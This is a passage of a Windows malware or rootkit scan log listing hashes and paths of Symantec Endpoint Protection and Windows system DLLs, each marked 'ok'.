15:33:59.0723 0x04bc  [ 1E5422B2F511E16AEFFB0875D56692A6, 1C6BF394F9FD8E1B8402DDE11EEEA210BEDF78F58ED3E7026099B5BA8BFA293C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccL120U.dll
15:33:59.0723 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccL120U.dll - ok
15:33:59.0726 0x04bc  [ 4F096D96285E06CD51AEF7D2D3DE04DA, 5BB420FBE28315F2117376052BB8488CE84A3398DDA65005B8AE1F792017E9A8 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\msvcp100.dll
15:33:59.0726 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\msvcp100.dll - ok
15:33:59.0728 0x04bc  [ DF3CA8D16BDED6A54977B30E66864D33, 1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\msvcr100.dll
15:33:59.0728 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\msvcr100.dll - ok
15:33:59.0730 0x04bc  [ 76168DD534E0ADF0F30F0CA809525FCE, 39955DBBE00391955FA8313FF1B9C815BE7B6AA615D36345E579476E789E91EC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\mfc100u.dll
15:33:59.0730 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\mfc100u.dll - ok
15:33:59.0732 0x04bc  [ 68E48BE48C473DDFC26C821DD5A83818, 9BF33EBAE4DCC2938798A1C16B98DCA287B7C07BD856481C00F0BE59DBC4C30B ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SymDeltaDll.dll
15:33:59.0732 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SymDeltaDll.dll - ok
15:33:59.0734 0x04bc  [ 1FD37C00535502429DD964EC53D66FB8, E80E6FD717FB9785379DD00269DEC89E46FF9D4102E378D689589645A7B074AC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BHSvcPlg.dll
15:33:59.0734 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BHSvcPlg.dll - ok
15:33:59.0736 0x04bc  [ C5D664FCEFE3B7E1541B38529A9E994A, 14C21D51DD5EF82E6C0FF8D34CBF322624B870FD855F2C50DD1233520A8E8FD5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\IPSPlug.dll
15:33:59.0736 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\IPSPlug.dll - ok
15:33:59.0738 0x04bc  [ 2DC70A3E2AD78EDF2F483ABC328F1AA5, E4274C490331B96090DCD3C0ABE4F7A79A1C17867B7A6804AE9E1AE57B3349EF ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\EimLoader.dll
15:33:59.0738 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\EimLoader.dll - ok
15:33:59.0740 0x04bc  [ 4319063F8DC47E5AAA63F3ED5E1F6470, 81B79B23F25C3E240D3DCE6853D6D9205B4FF5E2E5CBEAFDE0899B6060C1661D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\hwiddll.dll
15:33:59.0740 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\hwiddll.dll - ok
15:33:59.0742 0x04bc  [ F32077DF74EFD435A1DCDF415E189DF1, 24BB6838DEFD491DF5460A88BED2D70B903A2156C49FB63E214E2C77251ECA71 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\mfc100u.dll
15:33:59.0742 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\mfc100u.dll - ok
15:33:59.0744 0x04bc  [ 352B3DC62A0D259A82A052238425C872, 393B24E0D6007C74AEE2FB2EE2C18623D37DF64E279B6767952DCFEE0EACBB10 ] C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
15:33:59.0744 0x04bc  C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll - ok
15:33:59.0746 0x04bc  [ 18AB2E5A40064ED5F7791AC5946A90F3, B7536CE56702C23B1CEC3E1B6C78866E0A76808B85A92AF3733D9ED9429E004C ] C:\Windows\SysWOW64\msimg32.dll
15:33:59.0746 0x04bc  C:\Windows\SysWOW64\msimg32.dll - ok
15:33:59.0748 0x04bc  [ 43964FA89CCF97BA6BE34D69455AC65F, 10E3B89A5470E1BB6F73382135DD2352F5073C1EE8485D7476CFB5122D4AAA2F ] C:\Windows\SysWOW64\uxtheme.dll
15:33:59.0748 0x04bc  C:\Windows\SysWOW64\uxtheme.dll - ok
15:33:59.0750 0x04bc  [ D9A60691DACE3909EDDC1383528B7585, 2F860890F2FDDFE768D9A0CAA8809C3786C418A7D3396B9B0C607C0889BC8A02 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\DefUtDCD.dll
15:33:59.0750 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\DefUtDCD.dll - ok
15:33:59.0752 0x04bc  [ 39C5F32747B3414D1BB216FDB1DEFC58, 6FAE64CB9748304090113903A5AE9E7154BE16BA2EEA7AB3EF04AB9D79B81380 ] C:\Windows\SysWOW64\dwmapi.dll
15:33:59.0752 0x04bc  C:\Windows\SysWOW64\dwmapi.dll - ok
15:33:59.0754 0x04bc  [ 38B13C0DF479DBA23ECFA815159BA86E, C289C65AF3FB689AD6B770AB0E815860D9EA36FB2A8DE9F1818C63AD0FE47CBD ] C:\Windows\SysWOW64\ktmw32.dll
15:33:59.0754 0x04bc  C:\Windows\SysWOW64\ktmw32.dll - ok
15:33:59.0756 0x04bc  [ CB5FCDA9BB4914243C8F3AB7DDD8457D, 335298AF5C867D8CEC74BB2893B264EEBCAFE8847A4D2530F213172D8EAC0DB6 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AVHostPlugin.dll
15:33:59.0756 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AVHostPlugin.dll - ok
15:33:59.0758 0x04bc  [ 379A60F781E08BE0A4302428C6734A5E, 691B097E6C5A4AF2135B580A5893A70C0176C2A5B0079A303903447447DA855A ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\i2ldvp3.dll
15:33:59.0758 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\i2ldvp3.dll - ok
15:33:59.0760 0x04bc  [ 2FCA0D2C59A855C54BAFA22AA329DF0F, ED9D26F539065D62FCCEDEEC8E509B30F4D15F8DA586C1F657ACEFE9DABAACD0 ] C:\Windows\SysWOW64\netapi32.dll
15:33:59.0760 0x04bc  C:\Windows\SysWOW64\netapi32.dll - ok
15:33:59.0762 0x04bc  [ 20B3934DB73EABA2B49B7177873CB81F, 492EAC5C51472B43DE11825358AEC4B9E3A081DACFD7513C696D6FE40F302EE5 ] C:\Windows\SysWOW64\netutils.dll
15:33:59.0762 0x04bc  C:\Windows\SysWOW64\netutils.dll - ok
15:33:59.0764 0x04bc  [ 5CCDCD40E732D54E0F7451AC66AC1C87, 66F4DA105BD72E41250CD59E2B3CD931B47AC9FDB6C784B9E33C5EE1AC29841F ] C:\Windows\SysWOW64\srvcli.dll
15:33:59.0764 0x04bc  C:\Windows\SysWOW64\srvcli.dll - ok
15:33:59.0765 0x04bc  [ E5A4A1326A02F8E7B59E6C3270CE7202, DCB76016F9AC47E631540874DA208A089F9D529DA9628705A2869B954526BFE0 ] C:\Windows\SysWOW64\wkscli.dll
15:33:59.0765 0x04bc  C:\Windows\SysWOW64\wkscli.dll - ok
15:33:59.0767 0x04bc  [ 521B748A7F9923302CA18B7E6AA2EEAE, 6243D4F29B28242E308359624B5E68AC8A57D811521193487973794EDCE55787 ] C:\Windows\SysWOW64\activeds.dll
15:33:59.0767 0x04bc  C:\Windows\SysWOW64\activeds.dll - ok
15:33:59.0769 0x04bc  [ 51F5CC1E7DA3D9C664C2D0D61F315E06, 0A50A35863C9679E8DFC0783D5F1F6411010873738C6B1D90B7E993D2C6CFB06 ] C:\Windows\SysWOW64\adsldpc.dll
15:33:59.0769 0x04bc  C:\Windows\SysWOW64\adsldpc.dll - ok
15:33:59.0771 0x04bc  [ A8BB45F9ECAD993461E0FEF8E2A99152, ACB756EA54E71F124D928829666B5B439785593877FF7C0C76ADCF954F4E6C94 ] C:\Windows\SysWOW64\Wldap32.dll
15:33:59.0771 0x04bc  C:\Windows\SysWOW64\Wldap32.dll - ok
15:33:59.0773 0x04bc  [ E424B3EF666B184CEE0B6871AAA8C9F6, D182D9B3A813C75F88CA16A9C236AB6167DF5861D155B5DC016B90918C4BD579 ] C:\Windows\System32\msimg32.dll
15:33:59.0773 0x04bc  C:\Windows\System32\msimg32.dll - ok
15:33:59.0774 0x04bc  [ 5F4342C36142C4BC8736776283089A58, DE96C788EC39A1764CE83790FDCC85717E101B07401B8D36EE97BE5246B66B93 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\mfc100.dll
15:33:59.0774 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\mfc100.dll - ok
15:33:59.0777 0x04bc  [ F7F17674F8F80D8641195DFA456C33DE, 4C33CF110AB3C818A4B9E263338C7C9BF9FE8BB3C80B139CFF4312FCDEE29925 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyLog.dll
15:33:59.0777 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyLog.dll - ok
15:33:59.0779 0x04bc  [ 893C44082C97F7AED3E7C180FA1F93D8, E09740D26A0C9723DE55173134DBBEB663A34085297AB14D7AEACD2BD594E55B ] C:\Windows\System32\mpnotify.exe
15:33:59.0779 0x04bc  C:\Windows\System32\mpnotify.exe - ok
15:33:59.0780 0x04bc  [ F10E5311E5093FA3C00FF88C54C32FCA, B557F5B00D77F030850D9AAC0FFEFC4C2A759EC4081C8459C9DEAE51BAAACC65 ] C:\Windows\SysWOW64\atl.dll
15:33:59.0780 0x04bc  C:\Windows\SysWOW64\atl.dll - ok
15:33:59.0782 0x04bc  [ 0A4044A2C2F471DFE9834089F67DFE9F, EE7D0CE8AEF13E50A0DE35B5BAA28C900EE79C1430D7BE5B86059E00FF935675 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LicenseMan.dll
15:33:59.0782 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LicenseMan.dll - ok
15:33:59.0784 0x04bc  [ 14C44EF6C78A1D10032F70CE0E57A7C6, 13601BA3D061B35E39089CB52052ECCDB076B1F6C66523FC7F105C03A72C90CE ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccVrTrst.dll
15:33:59.0784 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccVrTrst.dll - ok
15:33:59.0787 0x04bc  [ FE7FBFF7637BDFA59A71E5C50DA4686F, AE9867587D34507E8C2094901FEB3D5EB084277B2D9FF71D60FB0260BBF19843 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\EFACli64.dll
15:33:59.0787 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\EFACli64.dll - ok
15:33:59.0788 0x04bc  [ BF4AC709BE5BF64F331F5D67773A0C82, 96E5A2A12D386B8A7976FEC76FD350E6A3EEBDF5763F4BBF4AB18880E9F269E0 ] C:\Windows\System32\perftrack.dll
15:33:59.0788 0x04bc  C:\Windows\System32\perftrack.dll - ok
15:33:59.0790 0x04bc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] C:\Windows\System32\wdi.dll
15:33:59.0790 0x04bc  C:\Windows\System32\wdi.dll - ok
15:33:59.0792 0x04bc  [ 2E648163254233755035B46DD7B89123, 6FA0D07CE18A3A69D82EE49D875F141E39406E92C34EAC76AC4EB052E6EBCBCD ] C:\Windows\System32\termsrv.dll
15:33:59.0792 0x04bc  C:\Windows\System32\termsrv.dll - ok
15:33:59.0794 0x04bc  [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] C:\Windows\System32\hidserv.dll
15:33:59.0794 0x04bc  C:\Windows\System32\hidserv.dll - ok
15:33:59.0796 0x04bc  [ 7E236CC26FF0C2513819FA453E2C5371, 45D3C83D60503A1D1F63398B2C8B7802C04B4E423A20F97FD15AECC994FB808F ] C:\Windows\System32\icaapi.dll
15:33:59.0796 0x04bc  C:\Windows\System32\icaapi.dll - ok
15:33:59.0797 0x04bc  [ 1075AB2C077B415760C0E948856B5126, D67804B4A038FC06BD84CBF9C047DD4C13073622027F825371DB98867EF4E9B9 ] C:\Windows\System32\wer.dll
15:33:59.0797 0x04bc  C:\Windows\System32\wer.dll - ok
15:33:59.0799 0x04bc  [ 988121D083B7AB61D4A7E244290BAAB0, 334AFF868BE30B0FB01C848C474E876A2AFB1CCF43397D9FCDE0DC35DC9866CF ] C:\Windows\System32\lsmproxy.dll
15:33:59.0799 0x04bc  C:\Windows\System32\lsmproxy.dll - ok
15:33:59.0801 0x04bc  [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] C:\Windows\System32\wpdbusenum.dll
15:33:59.0801 0x04bc  C:\Windows\System32\wpdbusenum.dll - ok
15:33:59.0803 0x04bc  [ 4449D23E8F197862F1B16F1E6C89C36C, 93AF52BF8E870C0381F027D3BB8F6829E449242074472F1593EB8172D7EB6559 ] C:\Windows\System32\diagperf.dll
15:33:59.0803 0x04bc  C:\Windows\System32\diagperf.dll - ok
15:33:59.0804 0x04bc  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] C:\Windows\System32\w32time.dll
15:33:59.0804 0x04bc  C:\Windows\System32\w32time.dll - ok
15:33:59.0806 0x04bc  [ F7073C962C4FB7C415565DDE109DE49F, 781E7088DCEFBC34A808C3E7DA41A56112B3F23ABE9F54B5EF4D5CD9CD016B1D ] C:\Windows\System32\npmproxy.dll
15:33:59.0806 0x04bc  C:\Windows\System32\npmproxy.dll - ok
15:33:59.0808 0x04bc  [ 7961AAD46149CD5510DD405FA5DE1D3F, 6D7929A62323CA5FA93991BD54E37503F94A80ADEE49CE8347CE626BBEA2A6C4 ] C:\Windows\System32\vmictimeprovider.dll
15:33:59.0808 0x04bc  C:\Windows\System32\vmictimeprovider.dll - ok
15:33:59.0810 0x04bc  [ 241CBD0F099F3D68892D19879E53722D, 61FBBF89B724D553288953BF4FAAED4AF74591A3575800F8BE1D328186501A91 ] C:\Windows\System32\wbem\WmiPrvSE.exe
15:33:59.0810 0x04bc  C:\Windows\System32\wbem\WmiPrvSE.exe - ok
15:33:59.0812 0x04bc  [ 99ACCC4AEAD66FDDD1968DD093B24240, 4570742FDD18921F89B5BB50CB67F2C56042C5B18DAF62E216161B65F8F2180F ] C:\Windows\System32\wbem\cimwin32.dll
15:33:59.0812 0x04bc  C:\Windows\System32\wbem\cimwin32.dll - ok
15:33:59.0814 0x04bc  [ 90FDC54CE951C93D541925D7486F1314, F503AA92B6321B6BDB763C9FD191F3FBE928CC8F2D2C388311125CC3D7EAA0F0 ] C:\Windows\System32\framedynos.dll
15:33:59.0814 0x04bc  C:\Windows\System32\framedynos.dll - ok
15:33:59.0815 0x04bc  [ 0D893F8D145D3B125B0226727C243A69, B344A18C5D5324A891B6E2121EC375AFB9E83D4C59D64EDD2E63854ABEC5D734 ] C:\Windows\System32\security.dll
15:33:59.0815 0x04bc  C:\Windows\System32\security.dll - ok
15:33:59.0817 0x04bc  [ F11A57E91FDAECFB41A5CB21EB1EBC8E, 904DA963F2274ADF521660E3131DAC781E59C6FAEB393E57802A3B5638C09283 ] C:\Windows\System32\dssenh.dll
15:33:59.0817 0x04bc  C:\Windows\System32\dssenh.dll - ok
15:33:59.0819 0x04bc  [ 012787CEB35505EB78DF82E0A0072888, FE082EF9F8462589F8C8BEEFB1D10AB06E1E3D6F4494CABF34097328C109C03E ] C:\Windows\System32\browcli.dll
15:33:59.0819 0x04bc  C:\Windows\System32\browcli.dll - ok
15:33:59.0821 0x04bc  [ C4BFE4B61086416B0529212F92BCE081, A5EE6FB81229885C7A4A4EF0A9C3E9EE9E7F85C1EDE9BEEE236EB0503093D8F3 ] C:\Windows\System32\schedcli.dll
15:33:59.0821 0x04bc  C:\Windows\System32\schedcli.dll - ok
15:33:59.0822 0x04bc  [ E377BBA01F34E4183C32E5BBD688CE83, 73DD5C66D0FCB06E813E21A768AEA4F91204BD4008CE4496164455161EA7E4A8 ] C:\Windows\System32\regapi.dll
15:33:59.0822 0x04bc  C:\Windows\System32\regapi.dll - ok
15:33:59.0824 0x04bc  [ AD7FB087A238883D1618F29F7BBBD584, D9541CA4D2AADFEEEC195863133B16C2EC94CA63F842F5646F7834F2D0E85FF3 ] C:\Windows\SysWOW64\ncrypt.dll
15:33:59.0824 0x04bc  C:\Windows\SysWOW64\ncrypt.dll - ok
15:33:59.0826 0x04bc  [ 362935A80DAA7C41DE2B797078B5830E, CC3D6849ACC38A4E7C46947AE3410ABCC564C77531ED56F1C8299EDB45A0A072 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AgentCore.dll
15:33:59.0826 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AgentCore.dll - ok
15:33:59.0828 0x04bc  [ CE71B9119A258EDD0A05B37D7B0F92E3, D9310C5BBFE089B8C81E259C462EC1E6D7A7A87FA59FC1F174ED5C58D409AE7A ] C:\Windows\SysWOW64\bcrypt.dll
15:33:59.0828 0x04bc  C:\Windows\SysWOW64\bcrypt.dll - ok
15:33:59.0830 0x04bc  [ E8449FE262D7406BCB2AC2A45C53EC5F, 6C118C9FB26404D1943824CF3990F36E12986547FFACB7CC0DF975A913065D78 ] C:\Windows\SysWOW64\bcryptprimitives.dll
15:33:59.0830 0x04bc  C:\Windows\SysWOW64\bcryptprimitives.dll - ok
15:33:59.0832 0x04bc  [ 4BD781EAD6AF802E5F700E312B903790, 47BF74BF593F8A0D351A87580373A4F147F740FFBF706EB9EFDB509A50479AC0 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\DataMan.dll
15:33:59.0833 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\DataMan.dll - ok
15:33:59.0835 0x04bc  [ D6FAAA6B16878C508705DB86FB90C88F, DF707D116B5D123691232757AA17AD8F138CC76BC555466E8BA93675133067C2 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\ActaRes.dll
15:33:59.0835 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\ActaRes.dll - ok
15:33:59.0837 0x04bc  [ 164EA9CDBA6B4CDD7731A23E7FD933FA, 56CC6528A572D9C18D7F2A168D67F29BA38C28EFCE3B6EE26512C7270DA0B696 ] C:\Windows\SysWOW64\wbemcomn2.dll
15:33:59.0837 0x04bc  C:\Windows\SysWOW64\wbemcomn2.dll - ok
15:33:59.0839 0x04bc  [ D639B766AEBC5CCDA75447D4BCFB952E, 8940842D71FCD967044DB2CE9AFA8991C3BDE125A39563F39FD62703DC3B4183 ] C:\Windows\SysWOW64\wbem\wbemprox.dll
15:33:59.0839 0x04bc  C:\Windows\SysWOW64\wbem\wbemprox.dll - ok
15:33:59.0841 0x04bc  [ 622065F22BE4E4CACE5D552997D15EE6, 86A683121D01278548BF6497BDF4A3F4B33A1A8340D3D5AD0DC5117F9622E5FB ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\DSCli.dll
15:33:59.0841 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\DSCli.dll - ok
15:33:59.0843 0x04bc  [ 18F421D42906BDFFB4AA430834D368BE, 8C40DA6BAAF1ABB8CCF9DACDA5C41478D7D3049A4A3379BDEA2BBF27779BBDF8 ] C:\Windows\SysWOW64\wbem\wbemsvc.dll
15:33:59.0843 0x04bc  C:\Windows\SysWOW64\wbem\wbemsvc.dll - ok
15:33:59.0845 0x04bc  [ 009C4A73889CF820A42C78763AC267A1, 8AC1D0634FCAC5EC0685B9B813786D1170ABF6888A7FC2F2AE16D41161A29949 ] C:\Windows\System32\cscapi.dll
15:33:59.0845 0x04bc  C:\Windows\System32\cscapi.dll - ok
15:33:59.0847 0x04bc  [ 5A74597CC9007A25458F5F388A539B9D, F17D06938DDDD5F1A643E7BD2F8954C72D5147E0A681497954CA8DB8ABB197DD ] C:\Windows\SysWOW64\wbem\fastprox.dll
15:33:59.0847 0x04bc  C:\Windows\SysWOW64\wbem\fastprox.dll - ok
15:33:59.0849 0x04bc  [ F3D202F53A222D5F6944D459B73CF967, E9F1D48EB333D32331BCFD0348FE07BEE7D5352292E6020571DA395F596AFFE7 ] C:\Windows\System32\fltLib.dll
15:33:59.0849 0x04bc  C:\Windows\System32\fltLib.dll - ok
15:33:59.0851 0x04bc  [ 177A652713000EFE4A78B8267A458500, 87AA35AE924ECC8E402ED6B10A93F161374D03FFAF4B92872638ECAA3E0650F8 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\PScanRes.dll
15:33:59.0851 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\PScanRes.dll - ok
15:33:59.0853 0x04bc  [ E3E811471DE781900FF21C1FD84E941E, 2A47FF52D1D6480AAD1919382E783EA184BF926311F8C7E466FEBE9F6FB88FD6 ] C:\Windows\SysWOW64\ntdsapi.dll
15:33:59.0853 0x04bc  C:\Windows\SysWOW64\ntdsapi.dll - ok
15:33:59.0855 0x04bc  [ 3FD15B4611D9BDA3F8013548C0ECAECA, B47A8D9985D9B71EB870816A0AB2B6403D394CCBDF7DE5378D5721D58D68D28D ] C:\Windows\SysWOW64\ntmarta.dll
15:33:59.0855 0x04bc  C:\Windows\SysWOW64\ntmarta.dll - ok
15:33:59.0856 0x04bc  [ C00DB14550E4BD49737F311C644E45FF, 7085C47DADEED82B6F98ED3903197D76B648E9D6CC67D40C789E236264D9A0DC ] C:\Windows\System32\wmi.dll
15:33:59.0856 0x04bc  C:\Windows\System32\wmi.dll - ok
15:33:59.0858 0x04bc  [ 32CD6D557A857210388E7B254E50FB49, 0F6C1C12511DC06394366B37DAF4A5F32156D0A27D503D14D2D89713405CA372 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IDSxpx86.dll
15:33:59.0858 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IDSxpx86.dll - ok
15:33:59.0861 0x04bc  [ 63DD6FBAABF881385899FD39DF13DCE3, 3B9AD8E2C1D03FF941A7C9192A605F31671B107DEF6FF503A71A0FB2C5BBD659 ] C:\Windows\System32\net.exe
15:33:59.0861 0x04bc  C:\Windows\System32\net.exe - ok
15:33:59.0863 0x04bc  [ E22F97FE1C002A31B93BD0364DC4C0F1, DF04D13BCA41369D907E0B4185181E6001343B65187CD5563F0E5CE8BC2BA4CD ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccSet.dll
15:33:59.0863 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccSet.dll - ok
15:33:59.0865 0x04bc  [ 17512337CCF38513E2CC91D273BF2B17, BC08ADDC531C180677B33A15655769A2263CC9DB9C589B201603DB90F9B4F122 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\CidsEimProxy.dll
15:33:59.0865 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\CidsEimProxy.dll - ok
15:33:59.0867 0x04bc  [ 996C6E958FD4981C2C44F3C754A23F44, 431D5619955227A4B288E81129BE4D21B32E8B79A645E8DF3F51B7AEE1D85177 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\IDSaux.dll
15:33:59.0867 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\IDSaux.dll - ok
15:33:59.0869 0x04bc  [ CD149AD3030CEC6E4A4BD5AB41068386, 5BA5E632D2B958BBF19D0F5292B6BFA095F40EE54DC56AEDE735A2E348ACCA9A ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHEngine.dll
15:33:59.0870 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHEngine.dll - ok
15:33:59.0871 0x04bc  [ 9DCA6DB5528F958EBA4FD6A6CC4AABCF, 9134F81A44DD036EAEF55BFEF142FCAF6359CAEA5DA58849EE84F908A160810F ] C:\Windows\SysWOW64\cscapi.dll
15:33:59.0872 0x04bc  C:\Windows\SysWOW64\cscapi.dll - ok
15:33:59.0874 0x04bc  [ 09EBF1F35C2FB39564019B3A5B30AD69, 7F3A3B8A5675E7032B2230D61D0A6B0ED535B54C72B8CE108523B9A2A333A038 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF25.dll
15:33:59.0874 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF25.dll - ok
15:33:59.0876 0x04bc  [ C11D7AA271E6F0CE656CB814125D5768, 41E770CA9BB7CA6B69CE390350ED7EFB8A9FF48F9AA7BD249F02A9D8534678EB ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SubmissionsEim.dll
15:33:59.0876 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SubmissionsEim.dll - ok
15:33:59.0878 0x04bc  [ BE28AE254E5C566D94E5C63C583AD843, 0DA20422FD39020C48FC4D218967839AB58C8DB296A453C412747EE6C579CCCB ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ProfileManagementClient.dll
15:33:59.0878 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ProfileManagementClient.dll - ok
15:33:59.0880 0x04bc  [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] C:\Windows\System32\IPSECSVC.DLL
15:33:59.0880 0x04bc  C:\Windows\System32\IPSECSVC.DLL - ok
15:33:59.0882 0x04bc  [ E64D9EC8018C55873B40FDEE9DBEF5B3, 2DB11E7C631A9887CB75AFEAD2C79EC65F82C51F5F073CEFC8CDDF664EFF29C1 ] C:\Windows\System32\PortableDeviceApi.dll
15:33:59.0882 0x04bc  C:\Windows\System32\PortableDeviceApi.dll - ok
15:33:59.0884 0x04bc  [ 09EBF1F35C2FB39564019B3A5B30AD69, 7F3A3B8A5675E7032B2230D61D0A6B0ED535B54C72B8CE108523B9A2A333A038 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF25.dll
15:33:59.0884 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF25.dll - ok
15:33:59.0886 0x04bc  [ 2DE2A25E3040CB40391643AF3DE17083, C5322D91B0D709CAEE854BD2817C0A87B3C6D7937237A89F3A81739F82A35C84 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF23.dll
15:33:59.0886 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF23.dll - ok
